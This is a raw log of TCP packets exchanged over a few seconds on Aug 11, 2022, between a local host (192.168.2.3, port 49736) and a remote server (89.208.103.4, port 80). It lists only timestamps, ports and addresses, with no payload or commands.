Aug 11, 2022 06:57:07.595979929 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.595999002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.596019030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.596028090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.596057892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.596071005 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.596112013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.907234907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.931777954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.961110115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.961143970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.961158991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.961174965 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.961190939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.961206913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.961220980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.961266041 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.961299896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.961307049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.971750975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.971777916 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.971792936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.971832991 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.971872091 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.975393057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975416899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975434065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975449085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975460052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.975464106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975478888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975495100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975501060 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.975511074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975521088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.975541115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.975569010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.975864887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975881100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975894928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975918055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.975940943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975946903 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.975958109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975972891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975987911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.975992918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.976003885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.976012945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.976018906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.976031065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.976043940 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.976046085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.976069927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.976099014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.985919952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.985971928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.985989094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986001968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986061096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.986093998 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.986387968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986407042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986422062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986439943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986449003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986464977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986475945 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986488104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986499071 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.986500025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986515045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986515999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.986530066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986543894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.986563921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.986588955 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.988513947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988540888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988555908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988569975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988584042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988599062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988615036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988617897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.988631010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988646030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988651037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.988653898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.988661051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988666058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.988677025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988691092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988692999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.988707066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988723040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988730907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.988738060 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988753080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988753080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.988768101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988778114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.988781929 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.988797903 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.988828897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.989022970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.989039898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.989053011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.989064932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.989080906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.989111900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.999036074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.999061108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.999087095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.999103069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.999116898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.999118090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.999130964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.999145985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.999149084 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.999188900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.999990940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.000010014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.000025034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.000066042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.000102043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003237963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003261089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003276110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003289938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003305912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003317118 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003319025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003329039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003340960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003344059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003401041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003432989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003446102 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003490925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003509045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003524065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003544092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003546953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003560066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003572941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003587961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003588915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003601074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003612995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003627062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003642082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003657103 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003659010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003662109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003670931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003674984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003681898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003700972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003705025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003715992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003731966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003748894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003763914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003779888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003796101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003810883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003827095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003829002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003842115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003856897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003871918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003884077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003889084 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003889084 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003891945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003895044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003900051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003906965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003911972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003922939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003935099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003952026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003968000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003982067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.003995895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.003997087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004009008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004019976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004034042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004049063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004065037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004080057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004101038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004105091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004116058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004131079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004144907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004159927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004160881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.004174948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004189968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004199982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.004204035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.004206896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.004214048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.004223108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.004316092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.014240980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.014341116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.021574974 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.021596909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.021617889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.021636009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.021641970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.021657944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.021665096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.021677971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.021684885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.021713018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.021730900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022011042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022030115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022051096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022058964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022072077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022074938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022092104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022094965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022111893 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022118092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022133112 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022136927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022151947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022161007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022171974 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022176981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022191048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022193909 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022211075 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022217989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022232056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022233963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022250891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022258043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022270918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022274971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022290945 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022295952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022310972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022315025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022332907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022340059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022351980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022356987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022371054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022378922 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022391081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022411108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022416115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022433996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022453070 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022454023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022459984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022473097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022495985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022527933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022545099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022578955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022591114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022598028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022619009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022624016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022638083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022641897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022659063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022661924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022679090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022679090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022699118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022707939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022727966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022737026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022749901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022769928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022773981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022789955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022793055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022809982 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022813082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022830009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022850037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022851944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022870064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022877932 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022890091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022910118 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022911072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022929907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022948980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022950888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022969007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022978067 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.022989035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.022998095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023010015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023029089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023030043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023049116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023051977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023070097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023091078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023093939 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023111105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023113966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023130894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023145914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023150921 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023170948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023174047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023190975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023211956 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023215055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023233891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023252964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023252964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023272991 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023272991 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023293972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023303032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023313999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.023334026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.023334980 CEST	80	49736	89.208.103.4	192.168.2.3
